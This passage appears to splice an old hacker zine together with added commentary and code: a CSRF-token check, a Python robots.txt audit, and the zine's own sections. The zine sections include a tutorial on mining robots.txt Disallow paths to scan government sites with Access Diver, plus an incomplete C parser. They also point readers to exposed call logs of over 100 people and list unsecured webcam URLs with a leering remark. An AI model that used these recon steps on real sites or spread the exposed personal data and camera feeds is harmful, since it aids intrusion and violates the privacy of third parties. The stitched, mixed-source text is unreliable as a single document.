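    if not hmac.compare_digest(params.get("csrf_token", ""), session.csrf_token):
        return "refused: bad or missing CSRF token"
    uid = int(params.get("user_id", "0"))
    if members.pop(uid, None) is None:
        return f"no such user {uid}"
    return f"deleted user {uid}"


if __name__ == "__main__":
    for name, row in filter_outcomes().items():
        print(name, row)
```

the outcomes table makes the pattern visible: v2 only rejects the plain payload, v3 rejects both local-path payloads but has no way to know what a remote 'exploit.jpg' url will redirect to, so filtering the url shape can only ever chase the last bypass. the token check needs no opinion about the url at all. one side note on the quoted v3: its replacement runs under the e modifier, which evaluates the replacement string as php; that modifier was removed in php 7, so the same filter would need a preg_replace_callback rewrite to run on a current interpreter.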
purpose
-------
use access diver to automate the process of scanning robots.txt files
supplies needed
---------------
access diver
sample robots.txt file
a parsing program
mining robot files is fairly easy with the right tools. first what we will do is take a robots.txt file.
access diver exploiter config files are formatted like this:
/urltoscan
root or local or fullurl
checked or unchecked
response code if any
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

void usage(void)
{
printf("./robots.txt <input file> <output file>\n");
}

int main(int argc, char *argv[])
{
FILE *input_file;
FILE *output_file;
char line[256];
char url[256];
if (argc < 3) {
usage();
exit(1);
}
printf("[+] robots parsing program\n");
printf("[+] written by stderr.\n");
printf("############################\n");
input_file = fopen(argv[1],"r");
if (input_file == 0) {
printf("error opening file.\n");
exit(1);
}
output_file = fopen(argv[2],"w");
if (output_file == 0) {
printf("error opening file.\n");
exit(1);
}
/* the loop that reads the disallow lines into line/url and writes the four-line
exploiter entries is not reproduced in this copy */
fclose(input_file);
fclose(output_file);
return 0;
}
once you have done this, save the output to robots1.ini in a directory you will remember. now, open access diver and go to the exploiter tab. click on the folder icon and load the ini file. type the url where you got the robots file (like http://whitehouse.gov) and it will scan all the urls for you. special thanks to stderr for his help on this.
this would be good for sites with long robots files like whitehouse.gov and epa.gov
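the google mining guide's point that google obeys robots.txt, and the parsing step above, come down to the same fact: robots.txt is a public list of the paths a site owner would rather not have indexed, honoured only by well-behaved crawlers. the following is an added example, in python rather than c and not stderr's program or the zine's: it parses a robots.txt into per-user-agent rule groups (consecutive user-agent lines share the rules that follow them) and flags disallow entries that look like they name admin, backup or private locations, which is the audit a site owner wants to run on their own file since anything listed there needs real access control, not a crawler hint. the sample file and the sensitive-word list are constructed for the example:

```python
import re
from typing import Dict, List, Tuple

# Constructed sample robots.txt for the example; not taken from any real site.
SAMPLE_ROBOTS = """\
# constructed example
User-agent: *
Disallow: /cgi-bin/
Disallow: /admin/
Disallow: /backup/site-2005.tar.gz
Allow: /public/
Crawl-delay: 10

User-agent: Googlebot
Disallow: /tmp/
Disallow: /private/notes.txt
"""

_AGENT_RULE = re.compile(r"^user-agent\s*:\s*(.*)$", re.I)
_PATH_RULE = re.compile(r"^(allow|disallow)\s*:\s*(.*)$", re.I)

# Words that, in a Disallow path, usually mean "this should be behind auth,
# not merely hidden from crawlers".  Constructed starting list; extend per site.
SENSITIVE = ("admin", "backup", "private", "cgi-bin", "tmp", ".sql", ".tar", ".zip", ".bak")


def parse_robots(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Group rules by user-agent; each rule is (directive, path).
    Comments (#...) and blank lines are ignored.  A User-agent line that
    follows rule lines starts a new group."""
    groups: Dict[str, List[Tuple[str, str]]] = {}
    current: List[str] = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = _AGENT_RULE.match(line)
        if m:
            if in_rules:
                current, in_rules = [], False
            agent = m.group(1).strip()
            current.append(agent)
            groups.setdefault(agent, [])
            continue
        in_rules = True            # any other directive (Allow, Disallow, Crawl-delay...)
        m = _PATH_RULE.match(line)
        if m:
            for agent in current:
                groups[agent].append((m.group(1).lower(), m.group(2).strip()))
    return groups


def disallowed_paths(groups: Dict[str, List[Tuple[str, str]]]) -> List[str]:
    """Every distinct Disallow path across all groups, in file order."""
    seen: List[str] = []
    for rules in groups.values():
        for directive, path in rules:
            if directive == "disallow" and path and path not in seen:
                seen.append(path)
    return seen


def audit(text: str) -> List[Tuple[str, str]]:
    """(path, reason) for each Disallow entry that looks like it discloses a
    location that needs access control rather than a crawler hint."""
    findings = []
    for path in disallowed_paths(parse_robots(text)):
        low = path.lower()
        hit = next((w for w in SENSITIVE if w in low), None)
        if hit:
            findings.append((path, f"matches sensitive pattern '{hit}'"))
    return findings


if __name__ == "__main__":
    for path, reason in audit(SAMPLE_ROBOTS):
        print(f"{path}: {reason}")
```

the parser keeps Allow lines too, so the same groups can drive a second check (does any Allow re-expose a path a broader Disallow hid?); the audit only looks at what is disclosed, because that is the part a scanner reading the file would act on.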
=================================
= bellsouth and government =
= doc droppage =
=================================
thanks to the careless management at pnn.gov.co you can see bellsouth call logs in spanish for over 100 people. we figured we'd just give you the url instead of wgeting it. if anybody has an archive of this site please contact us so we can make it available:
http://www.pnn.gov.co/docs/pruebas/moviles/coexistencia/bellsouth/
===========================
= webcam update =
===========================
thanks to snags of digital-deception.net for submitting these:
http://195.243.185.195/view/indexframe.shtml
airport in stuttgart, germany
http://webcam.rockdetente.com/view/indexframe.shtml
didn't bother doing a reverse and arin to find out where this one is, but there's a nice chick working at this recording studio
http://webcam.lajollademismaloya.com/view/indexframe.shtml
a resort
=============================
= spread lynn-cisco project =
=============================
the idea that people can't spread the lynn document on the cisco vuln is bullshit. although cisco has been hacked, we believe
mirrors. if you have a mirror set up email us a link. this is an effort to bypass and stop censorship. please join us in the
http://sr2.mytempdir.com/110387
http://rapidshare.de/files/3794495/lynn-cisco.pdf.html
http://www.jwdt.com/~paysan/lynn-cisco.pdf
http://www.warbard.ca/temp/lynn-cisco.pdf
http://www.viruswatch.nl/info/lynn-cisco.pdf
http://www.security.nnov.ru/files/lynn-cisco.pdf
===========================
= the realist's manifesto =
===========================
when i first saw this in "weapons of mass delusion" by richard forno i just had to include it:
"i call myself a realist and this is my manifesto:
i am a realist. i live my life based on reality, not wishful
thinking, hyperbole, spin, empty promises, fear mongering,
or adherence to a single party platform. i will not subscribe to
a single party line, and most importantly, i pride myself on
routinely doing a very contemporary un-american thing by
thinking for myself and forming my own opinions on the issues
impacting on my life and nation."
i think this is a very important quote because it teaches us to think, speak, and act as ourselves and not to conform to the prejudiced, biased, and corporate driven views that are forced upon us by gluttonous, rich, and stuck-up american politicians and businesses. this is not the entire manifesto but just the introduction. i suggest you get the book to read it. the manifesto is in the beginning of the first chapter and is pages long. you can get the book online for free at the official website infowarrior.org
===============
= mail.b0x =
===============
i finally got a reply from yahoo geocities abuse. i listed the email that i sent before but i'll show it again in case you forgot.
======================
my email:
"dear geocities hosting,
you are hosting the site kenexfinances.com
this site is operating fraudulently and pretending to be an
online bank. there are many ways to tell this bank is fake.
the bank is not listed with any of the proper banking
authorities which it needs to be and there is no reference
of it on the web. the phone numbers listed resolve to
satellite phones and not actual phone lines. the site makes
outright lies about the operation of its business. the web
design is poor. this site has stolen graphics from other
sites along with text and superimposes its name on them. the
site insecurely stores member information which is directly
in the source of the web page. this site is listed with
aa419.org which is an anti 419 scam organization which works
very closely with many government bodies including the south
african police services website located at 419legal.org
the entry for this bank may be found at:
http://aa419.org/fake-banks/fakebanksview.php?key=4224
we request that you shut down this site immediately and save
a back-up of the data for federal authorities which may be
investigating this site. refusal or neglect to shut down
this site is a federal crime and you could be charged with
knowingly allowing criminal activities to occur on your
server.
please reply."
their reply:
"hello,
http://docs.yahoo.com/info/terms/geoterms.html
regards,
this email came about a month after they shut down the site but at least they got around to it.
=========================
got a reply from the "recover my accounts" guy who had like 10 "accounts" that got hacked.
"hey. what if i get some one in russia to help me hack and get my accounts back?? will police catch me? in russia people hack casinos websites, usa and ntto military bases u would know u are a hacker urself and easy get away with that. so if i get
reply:
"dear i.r.m.,
i sincerely don't believe these are your accounts. it is most likely the police won't catch you soon. the only way they would catch you is if they caught the russian hacker but it will catch up to you in the future. maybe you should give up your petty dreams with this stupid online game and move on. it is true that those hackers get into us computer systems such as military and government computers but most of them get caught. it isn't easy to get away from such a crime because the us government has unlimited resources and you have your check from the bank. you will probably not get in trouble but bad people get their
shouts to
----------
34019 of pandora-security
xplicit pwned by his dsl and nickserv
?hate remix-radio
nunez is never on irc... wtf?
thefailure you know why *wink*
dexlyisc his freezer exploded. hahahahahahahahah!
phatal take your trash elsewhere fucker. ouch! slammed in a zine.
gizmo stop hovering. that was between me and him, stay out of it.
kazm thanks for all the help on the hacker torrents and the hosting!
the lwc thanks for the inspiration (lad wrecking crew)